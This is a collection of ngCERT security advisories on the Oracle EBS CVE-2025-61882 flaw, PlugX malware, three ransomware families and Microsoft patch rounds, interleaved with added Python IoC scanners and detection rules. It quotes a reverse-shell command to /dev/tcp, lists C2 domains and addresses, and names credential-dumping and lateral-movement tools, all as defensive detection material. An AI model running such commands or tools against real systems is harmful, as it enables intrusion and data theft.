Advisory ID: ngCERT-2025-100005
SUMMARY
ngCERT has detected a critical and easily exploitable vulnerability affecting the Oracle E-Business Suite (EBS) in Nigeria. This vulnerability, assigned CVE-2025-61882, could be exploited remotely by an unauthenticated attacker with network access via HTTP to achieve remote code execution (RCE), potentially leading to full system takeover. Assigned a CVSS 3.1 base score of 9.8 (Critical), the flaw has been actively exploited in the wild by the Cl0p ransomware group and has consequently been listed in CISA's Known Exploited Vulnerabilities (KEV) Catalogue. There is therefore an urgent need for organisations to update applications and apply patches to safeguard against exploits and possible cyberattacks.
Damage: Critical (CVSS 3.1 Base Score 9.8)
Probability: High
Platform(s): Oracle e-Business Suite
DESCRIPTION
CVE-2025-61882 is a critical vulnerability in the BI Publisher Integration component of Oracle Concurrent Processing within Oracle EBS versions 12.2.3 through 12.2.14. It arises from a chain of exploitable weaknesses, including inconsistent HTTP request parsing, path traversal, improper neutralisation of CRLF sequences, XML external entity (XXE) reference issues, XML injection, and server-side request forgery (SSRF). An unauthenticated attacker with HTTP network access crafts malicious HTTP requests to exploit these flaws. The attack begins by leveraging inconsistent request parsing and path traversal to access restricted server resources. By injecting crafted XML payloads, the attacker exploits XXE and XML injection vulnerabilities to manipulate server-side processing. CRLF injection escalates the attack by injecting malicious headers, enabling SSRF to trigger unauthorised server requests. This chain culminates in RCE, allowing the attacker to execute arbitrary commands on the server without authentication.
CONSEQUENCES
Successful exploitation of these flaws could result in:
- Full System Compromise: Unauthenticated attackers can achieve remote code execution (RCE), gaining complete control over the Oracle E-Business Suite (EBS) instance.
- Data Exfiltration: Sensitive business data, including financial and customer information, can be stolen, leading to severe privacy and intellectual property breaches.
- Ransomware Deployment: Exploitation by groups like Cl0p enables ransomware attacks, causing data encryption and operational paralysis.
- Confidentiality and Integrity Loss: Full exposure and modification of sensitive data, undermining system trustworthiness and business operations.
- Service Disruption: Denial of service can halt critical EBS functions, leading to significant operational downtime.
SOLUTION/MITIGATION
To mitigate these vulnerabilities, ngCERT recommends the following measures:
- Apply Security Patches: Immediately install patches for Oracle E-Business Suite versions 12.2.3–12.2.14 as specified in Oracle’s patch availability document (Note 3106344.1 on My Oracle Support). Ensure the October 2023 Critical Patch Update (CPU) is applied as a prerequisite.
- Restrict Network Access: Limit HTTP access to the BI Publisher Integration component to trusted IP ranges using firewall rules or web application firewalls (WAF) to block malicious requests.
- Monitor and Detect: Actively monitor logs for indicators of compromise (IOCs), such as IP addresses (e.g., 200.107.207.26, 185.181.60.11), commands (e.g., sh -c /bin/bash -i >& /dev/tcp/ / 0>&1), or file hashes (e.g., SHA-256: 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d).
- Upgrade EBS Versions: Migrate to supported EBS versions under Premier or Extended Support to ensure patch availability and enhanced security.
- Disable Unnecessary Features: Deactivate non-essential Concurrent Processing features to reduce the attack surface.
- Interim Isolation: If patching is delayed, isolate the EBS environment from untrusted networks and enhance logging to detect exploitation attempts.
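The "Monitor and Detect" item above lists three kinds of indicator (source IPs, a reverse-shell command, a SHA-256 hash). The following is an added example, not code from the ngCERT advisory or from Oracle, of a small scanner that checks log lines for those exact indicators. All log lines are constructed for the demonstration, the request paths are placeholders rather than real EBS endpoints, and the command rule keys on the stable part of the advisory's command pattern because the attacker host and port are elided in the advisory.

```python
"""Added example (not from the ngCERT advisory or Oracle): scan web-server
access, shell-audit and file-integrity log lines for the CVE-2025-61882
indicators listed in the advisory.  Sample lines below are constructed."""
import hashlib
import re

# Indicators copied from the advisory text.
IOC_IPS = {"200.107.207.26", "185.181.60.11"}
IOC_SHA256 = {"76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d"}

# The advisory gives the command with the attacker host and port elided, so
# the rule keys on the stable part: an interactive shell redirected to /dev/tcp.
REVERSE_SHELL_RE = re.compile(r"bash\s+-i\s+>&\s*/dev/tcp/")
IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
SHA256_RE = re.compile(r"\b[0-9a-f]{64}\b")


def scan_line(line):
    """Return a list of (indicator_type, value) hits found in one log line."""
    hits = []
    for ip in IPV4_RE.findall(line):
        if ip in IOC_IPS:
            hits.append(("ip", ip))
    if REVERSE_SHELL_RE.search(line):
        hits.append(("command", "interactive shell redirected to /dev/tcp"))
    for digest in SHA256_RE.findall(line.lower()):
        if digest in IOC_SHA256:
            hits.append(("sha256", digest))
    return hits


def scan_lines(lines):
    """Return [(line_number, hits)] for every line with at least one hit."""
    findings = []
    for number, line in enumerate(lines, 1):
        hits = scan_line(line)
        if hits:
            findings.append((number, hits))
    return findings


def file_matches_ioc(data):
    """True if the SHA-256 of the given file content is a listed IoC."""
    return hashlib.sha256(data).hexdigest() in IOC_SHA256


# Constructed sample lines: an access log, an audit record and a file-integrity log.
# Line 3 keeps the advisory's elision of the attacker host and port.
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Oct/2025:10:01:02 +0100] "GET /example/app/login HTTP/1.1" 200 5123',
    '200.107.207.26 - - [06/Oct/2025:10:03:44 +0100] "POST /example/app/upload HTTP/1.1" 200 812',
    'type=EXECVE uid=1001 cmd="sh -c /bin/bash -i >& /dev/tcp/<host>/<port> 0>&1"',
    'fim: new file /tmp/example.bin sha256=76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d',
    'fim: new file /tmp/other.bin sha256=' + "0" * 64,
]

if __name__ == "__main__":
    for number, hits in scan_lines(SAMPLE_LOG):
        print(f"line {number}: {hits}")
```

Run against real access logs and auditd or shell-history exports, a hit on the IP rule alone is a triage lead, while a hit on the command rule from the EBS application account warrants immediate isolation of the host, in line with the "Interim Isolation" item above.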
HYPERLINK
- https://www.oracle.com/security-alerts/alert-cve-2025-61882.html
- https://nvd.nist.gov/vuln/detail/CVE-2025-61882
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog
- https://www.crowdstrike.com/en-us/blog/crowdstrike-identifies-campaign-targeting-oracle-e-business-suite-zero-day-CVE-2025-61882/
- https://www.hipaajournal.com/cl0p-mass-exploiting-zero-day-vulnerability-oracle-e-business-suite/
- https://www.ncsc.gov.uk/news/active-exploitation-vulnerability-affecting-oracle-ebusiness-suite
Advisory ID: ngCERT-2025-100004
SUMMARY
ngCERT’s attention has been drawn to the resurgence of SOGU, aka PlugX malware infiltration, which poses a significant threat to Nigeria’s cyberspace. The malware is a sophisticated modular Remote Access Trojan (RAT) deployed by Advanced Persistent Threat (APT) actors in cyber-espionage campaigns. These attacks target critical infrastructure across multiple sectors, including telecommunication companies, as observed in current reports. SOGU is also identified as a backdoor with keylogging, surveillance, data exfiltration and stealth capabilities, while disguising itself as legitimate applications to avoid detection. New variants are equally capable of remote code execution, ensuring persistence through Dynamic Link Libraries (DLL) side-loading while implementing new C2 command identifiers. The compromise of critical infrastructure by this malware could result in privacy and data breaches, supply chain risks, financial losses, as well as reputational damage and possibly geopolitical implications. This underscores the need for public and private sector organisations to emplace robust defences to safeguard and mitigate the threats posed by PlugX.
Damage: Critical
Probability: High
Platform(s): Operating System, Networks and IoTs
DESCRIPTION
The recent PlugX attacks have targeted critical infrastructure, particularly telecommunications networks, by leveraging DLL side-loading for espionage purposes. In the initial access stage, attackers exploit legitimate executables, such as those from Quick Heal's Mobile Popup Application, to initiate DLL search order hijacking or side-loading of a malicious DLL. Notably, new variants also gain initial access by exploiting vulnerabilities in edge devices, such as firewalls and VPNs, and possibly weaknesses in IoTs. To deploy and execute the payload, the malicious DLL decrypts and loads PlugX (alongside variants like RainyDay or Turian) directly into memory. This is achieved by using Rivest Cipher 4 (RC4, a symmetric stream cipher) encryption and shared algorithms to evade disk-based detection. Likewise, the malware employs techniques like control flow flattening, API hashing, and embedded keyloggers to obscure its operations and resist reverse engineering. To ensure persistence and command execution, PlugX establishes long-term access, enabling arbitrary command execution, file uploads/downloads, and keylogging for credential theft and lateral movement within the network. Furthermore, compromised systems facilitate the theft of sensitive data, such as communications metadata, supporting broader cyber-espionage goals against critical sectors.
INDICATORS OF COMPROMISE
The following are observed Indicators of Compromise (IoCs):
1. Domains
a) [.]relivonline[.]com
b) [.]im0[.]site
c) [.]frillsforspills[.]com
d) [.]365safemail[.]com
2. IPs with Ports
a) 103[.]79[.]120[.]85:443
b) 103[.]79[.]120[.]92:443
c) 103[.]79[.]120[.]71:443
d) 103[.]79[.]120[.]71:5000
e) 103[.]107[.]104[.]61:443
f) 103[.]107[.]104[.]61:5000
g) 39[.]105[.]24[.]38:3478
h) 39[.]105[.]24[.]38:443
i) 121[.]201[.]74[.]246:5000
j) 69[.]172[.]75[.]148:5000
k) 154[.]90[.]47[.]123:443
l) 154[.]90[.]47[.]123:5000
m) 45[.]128[.]153[.]73:443
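The indicators above are written defanged ("[.]" for ".", and a leading "[.]" marking a domain together with its subdomains). Before they can be compared against proxy or flow records they have to be refanged and normalised. The following is an added example, not code from the ngCERT advisory, that builds a blocklist from the indicators as listed and checks constructed connection records against it; the record format (dicts with `host`, `dst_ip`, `dst_port`) is invented for the demonstration.

```python
"""Added example (not from the ngCERT advisory): refang the defanged SOGU/PlugX
indicators listed above and match proxy/netflow records against them.
Sample records below are constructed."""

# Indicators exactly as the advisory writes them (defanged).
DEFANGED_DOMAINS = [
    "[.]relivonline[.]com",
    "[.]im0[.]site",
    "[.]frillsforspills[.]com",
    "[.]365safemail[.]com",
]
DEFANGED_ENDPOINTS = [
    "103[.]79[.]120[.]85:443", "103[.]79[.]120[.]92:443",
    "103[.]79[.]120[.]71:443", "103[.]79[.]120[.]71:5000",
    "103[.]107[.]104[.]61:443", "103[.]107[.]104[.]61:5000",
    "39[.]105[.]24[.]38:3478", "39[.]105[.]24[.]38:443",
    "121[.]201[.]74[.]246:5000", "69[.]172[.]75[.]148:5000",
    "154[.]90[.]47[.]123:443", "154[.]90[.]47[.]123:5000",
    "45[.]128[.]153[.]73:443",
]


def refang(indicator):
    """Undo the common defanging conventions so the value can be compared."""
    return indicator.replace("[.]", ".").replace("hxxp", "http").strip()


def normalise_domain(indicator):
    # A leading "[.]" in the advisory marks the domain and all its subdomains,
    # so the stored form is the bare apex name in lower case.
    return refang(indicator).strip(".").lower()


def parse_endpoint(indicator):
    """'1[.]2[.]3[.]4:443' -> ('1.2.3.4', 443)"""
    ip, port = refang(indicator).rsplit(":", 1)
    return ip, int(port)


BLOCKED_DOMAINS = {normalise_domain(d) for d in DEFANGED_DOMAINS}
BLOCKED_ENDPOINTS = {parse_endpoint(e) for e in DEFANGED_ENDPOINTS}


def domain_matches(host):
    """True for the listed domain itself or any subdomain of it."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in BLOCKED_DOMAINS)


def endpoint_matches(ip, port):
    """Exact ip:port match, as the advisory lists IPs with ports."""
    return (ip, int(port)) in BLOCKED_ENDPOINTS


def find_matches(records):
    """Return [(index, reason)] for each record touching a listed indicator.
    Records are dicts with an optional 'host' and 'dst_ip'/'dst_port' keys."""
    found = []
    for i, rec in enumerate(records):
        host = rec.get("host")
        if host and domain_matches(host):
            found.append((i, f"domain {host}"))
        elif "dst_ip" in rec and endpoint_matches(rec["dst_ip"], rec["dst_port"]):
            found.append((i, f"endpoint {rec['dst_ip']}:{rec['dst_port']}"))
    return found


# Constructed records: two proxy entries (with a host) and three flow entries.
SAMPLE_RECORDS = [
    {"host": "www.example.org", "dst_ip": "198.51.100.20", "dst_port": 443},
    {"host": "cdn.relivonline.com", "dst_ip": "203.0.113.7", "dst_port": 443},
    {"dst_ip": "103.79.120.71", "dst_port": 5000},
    {"dst_ip": "103.79.120.71", "dst_port": 8080},   # listed IP, unlisted port
    {"dst_ip": "39.105.24.38", "dst_port": 3478},
]

if __name__ == "__main__":
    for index, reason in find_matches(SAMPLE_RECORDS):
        print(f"record {index}: {reason}")
```

The endpoint check is deliberately exact on ip:port, which is how the advisory lists them; a team that would rather be alerted on any traffic to the listed addresses can relax `endpoint_matches` to compare the IP alone (record 3 above shows the difference).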
CONSEQUENCES
SOGU aka PlugX malware attacks could result in:
- Extensive data exfiltration and espionage.
- Compromise of networks in critical sectors like telecom that can act as vectors for supply chain attacks.
- Economic and financial losses.
- Breaches that could further result in reputational damage, customer trust erosion, regulatory fines, and legal scrutiny.
- Operational disruptions and Denial of Service (DoS) attacks.
SOLUTION/MITIGATION
ngCERT recommends that organisations:
- Conduct regular security awareness training to help users recognize phishing attempts.
- Implement advanced email filtering solutions to block malicious emails before reaching end-users.
- Deploy and maintain up-to-date antivirus solutions capable of detecting PlugX signatures and behaviors.
- Enforce 2FA to protect access to sensitive systems and applications.
- Conduct regular analysis of system and network logs to identify anomalies related to PlugX behavior.
- Ensure the prompt application of patches and updates to all software to minimize exploitation opportunities.
- Filter network traffic by preventing unknown or untrusted access to remote services on internal systems.
- Ensure the review of domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.
HYPERLINK
- https://cybersecsentinel.com/the-return-of-plugx-malware-with-fresh-tricks/
- https://thehackernews.com/2025/09/china-linked-plugx-and-bookworm-malware.html
- https://security.googlecloudcommunity.com/community-blog-42/finding-malware-detecting-sogu-with-google-security-operations-3869
- https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx
Advisory ID: ngCERT-2025-100003
SUMMARY
ngCERT is aware of LockGoga, MegaCortex, and Nefilim, sophisticated hybrid ransomware variants which were active from 2019 to 2021 and are linked to a threat actor identified as deadforz, with aliases “Boba,” “msfv,” and “farnetwork.” These ransomware strains have targeted critical infrastructure, manufacturing, healthcare, and transportation sectors in several countries across the globe, resulting in the loss of millions of US dollars. This underscores the need for organisations to review their systems for indicators of compromise (IoCs) and strengthen defences against potential affiliate-driven attacks.
Damage: Critical
Probability: High
Platform(s): Microsoft Windows, Dell Firmware
DESCRIPTION
Notably, LockGoga targets industrial systems by utilizing Advanced Encryption Standard (AES) encryption, and appends ".locked" to files. Initial access is achieved through phishing or stolen Remote Desktop Protocol (RDP) credentials. Thereafter, the malware is dropped in the %TEMP% folder; it then disables networking, clears disk space with cipher.exe, encrypts files and demands email-based payment. MegaCortex is a hybrid ransomware used to target enterprises and possesses anti-analysis capabilities. Its attack chain involves initial access through phishing, SQL injection, or RDP exploits. Next, it uses Cobalt Strike for persistence, runs kill.bat to evade antivirus detection, propagates via Qakbot, and demands multi-million-dollar ransoms. Furthermore, Nefilim uses double extortion, encrypting files with AES-128 or RSA-2048 (Rivest–Shamir–Adleman, a family of public-key cryptosystems used for secure data transmission). It appends ".NEFILIM" or ".DERZKO" to files, and gains entry by exploiting CVE-2019-19781 (a critical vulnerability in Citrix Application Delivery Controller (ADC) and Gateway products that allows unauthenticated attackers to execute arbitrary code remotely via a directory traversal flaw). The threat actors also use RDP or phishing for initial access. Mimikatz and PsExec/WMI are then employed for credential dumping, lateral movement within networks, privilege escalation, and persistence before data is exfiltrated to cloud services such as MEGAsync. Thereafter, the criminals threaten to leak the sensitive information.
INDICATORS OF COMPROMISE
The following are observed Indicators of Compromise (IoCs):
1. LockGoga: SHA256 hashes in Fortinet/Unit42 reports; %TEMP% execution, cipher.exe use, ".locked" extensions; email-based ransom demands.
2. MegaCortex: Hashes in Heimdal reports; kill.bat, Cobalt Strike beacons, RDP port 3389 activity; Qakbot-related traffic.
3. Nefilim: Delphi-based samples; Mimikatz dumps, PsExec/WMI usage, MEGAsync exfiltration; connections to known exfil domains; Citrix exploit attempts.
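The IoCs above are mostly behavioural (execution from %TEMP%, cipher.exe use, kill.bat, ransom extensions, Mimikatz/PsExec activity), which is what the EDR recommendation further down is meant to catch. The following is an added example, not code from the ngCERT advisory, expressing those indicators as simple rules over endpoint telemetry. The event format (dicts with `type`, `image`, `cmdline`, `target`), the rule names and all sample paths are invented for the demonstration; the `/w:` switch is the real cipher.exe option that overwrites free disk space.

```python
"""Added example (not from the ngCERT advisory): behavioural rules for the
LockGoga / MegaCortex / Nefilim indicators, run over constructed endpoint
telemetry (process-start and file-rename events in an invented format)."""
import ntpath

RANSOM_EXTENSIONS = (".locked", ".nefilim", ".derzko")
CRED_AND_LATERAL_TOOLS = {"mimikatz.exe", "psexec.exe"}


def _basename(path):
    # ntpath handles Windows separators regardless of the host OS.
    return ntpath.basename(path).lower()


def rule_exec_from_temp(ev):
    """LockGoga: payload dropped in %TEMP% and executed from there."""
    return ev["type"] == "process" and "\\temp\\" in ev["image"].lower()


def rule_cipher_wipe(ev):
    """LockGoga: cipher.exe used to clear free disk space after encryption."""
    return (ev["type"] == "process" and _basename(ev["image"]) == "cipher.exe"
            and "/w:" in ev.get("cmdline", "").lower())


def rule_kill_bat(ev):
    """MegaCortex: kill.bat run to evade antivirus (batch files run under cmd.exe,
    so the rule keys on the command line rather than the image)."""
    return ev["type"] == "process" and "kill.bat" in ev.get("cmdline", "").lower()


def rule_ransom_extension(ev):
    """All three families: encrypted files renamed with a known extension."""
    return ev["type"] == "file_rename" and ev["target"].lower().endswith(RANSOM_EXTENSIONS)


def rule_cred_lateral_tools(ev):
    """Nefilim: Mimikatz / PsExec for credential dumping and lateral movement."""
    return ev["type"] == "process" and _basename(ev["image"]) in CRED_AND_LATERAL_TOOLS


RULES = [rule_exec_from_temp, rule_cipher_wipe, rule_kill_bat,
         rule_ransom_extension, rule_cred_lateral_tools]


def evaluate(events):
    """Return [(event_index, rule_name)] for every rule that fires on an event."""
    return [(i, rule.__name__) for i, ev in enumerate(events) for rule in RULES if rule(ev)]


# Constructed sample telemetry; index 0 and 6 are benign controls.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"type": "process", "image": r"C:\Users\alice\AppData\Local\Temp\update.exe", "cmdline": "update.exe"},
    {"type": "process", "image": r"C:\Windows\System32\cipher.exe", "cmdline": "cipher.exe /w:C:\\"},
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe", "cmdline": r"cmd.exe /c C:\ProgramData\kill.bat"},
    {"type": "file_rename", "source": r"D:\finance\q3.xlsx", "target": r"D:\finance\q3.xlsx.NEFILIM"},
    {"type": "process", "image": r"C:\Users\Public\mimikatz.exe", "cmdline": "mimikatz.exe"},
    {"type": "file_rename", "source": r"D:\docs\a.txt", "target": r"D:\docs\a.txt.bak"},
]

if __name__ == "__main__":
    for index, rule_name in evaluate(SAMPLE_EVENTS):
        print(f"event {index}: {rule_name}")
```

A single firing of `rule_exec_from_temp` is noisy on real fleets (installers do this); the value is in correlation, for example a %TEMP% execution followed within minutes by a cipher.exe wipe or a burst of `rule_ransom_extension` renames on the same host.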
CONSEQUENCES
Successful attacks by LockGoga, MegaCortex, and Nefilim ransomware variants could result in:
- Disruption of operations, supply chain interruptions and possible Denial of Service (DoS) attacks.
- Financial losses due to ransom payments, recovery costs and General Data Protection Regulation (GDPR) fines.
- Reputational damage due to data exposure from possible dark web leaks and the possibility of secondary extortion.
- National security risks occasioned by breaches to defence and sensitive critical infrastructure.
SOLUTION/MITIGATION
ngCERT recommends that organisations:
- Patch vulnerabilities such as CVE-2019-19781 and exposed RDP, enforce multifactor authentication, and implement Zero Trust and least-privilege access to limit initial access.
- Deploy Endpoint Detection and Response (EDR) for behavioural monitoring such as process injection, lateral movement, credential dumping and cloud exfiltration.
- Maintain offline, immutable backups (3-2-1 rule); test recovery quarterly; avoid ransom payments and report to ngCERT in the event of an attack, to ensure speedy recovery.
- Block IoCs at firewalls.
- Conduct regular phishing awareness training for all staff.
HYPERLINK
Advisory ID: ngCERT-2025-100002
SUMMARY
ngCERT has detected about 78 (medium to low) vulnerabilities primarily impacting Microsoft Windows components like Windows Digital Media and Secure Boot, as well as Dell firmware. These weaknesses include elevation of privilege (EoP), security feature bypasses, and improper access controls, with CVSS v3.1 scores from 4.3 to 8.1 (low to high severity). Most of these require local access, but exploitation could lead to system compromise or data exposure. Although the vulnerabilities have been patched, there is an urgent need for these systems to be updated and the patches applied to safeguard against exploits and possible cyberattacks.
Damage: Critical
Probability: High
Platform(s): Microsoft Windows, Dell Firmware
DESCRIPTION
The vulnerabilities mainly affect Microsoft Windows 10/11 and Server 2019/2022, with some impacting Dell firmware and older non-Microsoft products. Key details include:
a) Windows Digital Media (EoP): Over 40 CVEs, such as CVE-2025-21229 and CVE-2025-21255, involve improper input validation or out-of-bounds reads, allowing local attackers to gain SYSTEM-level privileges.
b) Windows Secure Boot: CVE-2025-21211 allows bypassing Secure Boot via flaws in DBX update validation, enabling unsigned bootloader execution.
c) Dell Firmware: CVE-2024-52537 permits high-privileged attackers to exploit symlink issues in the Dell Client Platform Firmware Update Utility for privilege escalation.
d) Other Microsoft Issues: CVEs like CVE-2024-55541 (audio driver buffer overflow) and CVE-2024-51456 (SMB Remote Code Execution) cover Denial-of-Service (DoS), kernel exploits, and remote code execution.
e) Legacy/Other Vendors: Older CVEs (such as CVE-2023-50946 in OpenSSH and CVE-2021-29669 in Zyxel) involve RCE, EoP, or information disclosure in non-Microsoft products.
CONSEQUENCES
Successful exploitation of these flaws could result in:
- Privilege Escalation: Local attackers could gain SYSTEM access, enabling malware persistence, data theft, or network lateral movement.
- System Integrity Loss: Secure Boot bypass (CVE-2025-21211) allows rootkits or tampered firmware to evade boot protections.
- Service Disruption: Denial of Service (DoS) issues, such as CVE-2024-55541, may crash services or leak kernel memory.
- Chained Attacks: These flaws could enable ransomware or APTs. No active exploits are reported as of October 2025, but local access increases insider threat risks.
SOLUTION/MITIGATION
To mitigate these vulnerabilities, ngCERT recommends the following measures:
- Apply Patches: Install Microsoft January 2025 updates via Windows Update or WSUS. For CVE-2024-52537, update Dell firmware using Dell Command Update.
- Enhance Access Controls: Enforce least privilege, disable untrusted media playback, and use AppLocker/WDAC to block unsigned binaries.
- Monitor and Harden: Enable Secure Boot and TPM 2.0; use EDR tools to detect privilege escalation. Apply upstream patches for legacy CVEs such as OpenSSH.
- Verify Systems: Scan for vulnerable versions with tools like Qualys or Tenable. Check Microsoft Security Response Centre for updates.
- Best Practices: Segment networks, adopt zero-trust, and test patches in staging environments. Isolate or retire end-of-support systems.
HYPERLINK
Advisory ID: ngCERT-2025-100001
SUMMARY
ngCERT has detected over 100 (Critical and high) vulnerabilities primarily affecting Microsoft Windows components like Office and a few third-party issues. Key risks include remote code execution (RCE), elevation of privilege (EoP), and zero-day exploits, with high CVSS scores (up to 9.8). Ten critical flaws and eight zero-days were noted, some actively exploited and listed in the US Cybersecurity and Infrastructure Security Agency's catalogue. It is pertinent to note that these vulnerabilities have been patched by Microsoft, hence the urgent need for system updates and the application of available patches.
Damage: Critical
Probability: High
Platform(s): Microsoft Windows
DESCRIPTION
The vulnerabilities principally affect Microsoft systems categorized as follows:
a) RCE in Core Windows Components (About 36% of Microsoft CVEs): Flaws enabling arbitrary code execution via emails, packets, or files with low interaction. Examples include Windows OLE (e.g., CVE-2025-21298 for zero-click Outlook previews), Telephony Service (over 20 CVEs like CVE-2025-21286, CVE-2025-21266, all CVSS 8.8), Remote Desktop Services (e.g., CVE-2025-21297), and others like BranchCache and SPNEGO authentication.
b) EoP in Virtualization and Installers (About 25% of Microsoft CVEs): Allows attackers to escalate to SYSTEM privileges. Notable are Hyper-V flaws, including CVE-2025-21333, exploited zero-days with CVSS 7.8, and App Installer issues such as CVE-2025-21275. Also includes NTLMv1 remote exploitation.
c) Office and Developer Tools Issues: RCE/EoP in Access, Excel, Outlook, .NET, and Visual Studio, including CVE-2025-21186, zero-days with CVSS 7.8, often via malicious documents.
d) DoS and Information Disclosure: Impacts services like MSMQ (e.g., CVE-2025-21251) and kernel memory leaks.
e) Third-Party and Older CVEs: Includes authentication bypass in Progress WhatsUp Gold, such as CVE-2024-12108 (CVSS 9.6), and legacy issues like Kerberos (2022 CVEs).
CONSEQUENCES
Successful exploitation of these flaws could result in:
- Full System Compromise: RCE flaws allow attackers to run arbitrary code as the user or SYSTEM, enabling malware deployment, ransomware, or persistent access.
- Privilege Escalation and Lateral Movement: EoP in Hyper-V or installers facilitates VM escapes, domain dominance, or supply-chain attacks in enterprise networks.
- Data Theft/Exfiltration: Information disclosures (e.g., NTLM hashes via CVE-2025-21308) enable pass-the-hash attacks; Office flaws risk sensitive document leaks.
- Service Disruption: DoS in MSMQ or RDP could halt critical operations in monitored environments.
- Broader Impact: Zero-days like CVE-2025-21298 are wormable via email, amplifying spread in unpatched fleets. For third parties such as WhatsUp Gold, unauthorized server access risks network-wide reconnaissance. Unmitigated, these could lead to regulatory non-compliance issues with GDPR and NIST, and financial losses from breaches.
SOLUTION/MITIGATION
To mitigate these vulnerabilities, ngCERT recommends the following measures:
- Patch Urgently: Apply January 2025 updates such as KB5040431 through Windows Update or management tools; prioritize exposed systems and test first.
- Hardening Measures: Disable NTLMv1, block unnecessary ports such as PGM UDP, restrict email previews in Outlook, enable Credential Guard for Hyper-V, and use EPA for authentication. For third-party tools like WhatsUp Gold, upgrade to patched versions and rotate keys.
- Detection Strategies: Deploy EDR for anomaly monitoring (e.g., Telephony or OLE activity), enable logging for RDP/MSMQ, and scan for PoCs.
- General Practices: Ensure network segmentation, least privilege, regular scans, and MSRC subscriptions to reduce exposure.
HYPERLINK
- https://jetpatch.com/blog/patch-tuesday/microsoft-january-2025-patch-tuesday/
- https://www.tenable.com/blog/microsofts-january-2025-patch-tuesday-157-cves-cve-2025-21333-cve-2025-21334-cve-2025-21335
- https://www.tenable.com/blog/microsofts-august-2025-patch-tuesday-addresses-107-cves-cve-2025-53779
- https://support.microsoft.com/en-us/topic/protections-for-cve-2025-26647-kerberos-authentication-5f5d753b-4023-4dd3-b7b7-c8b104933d53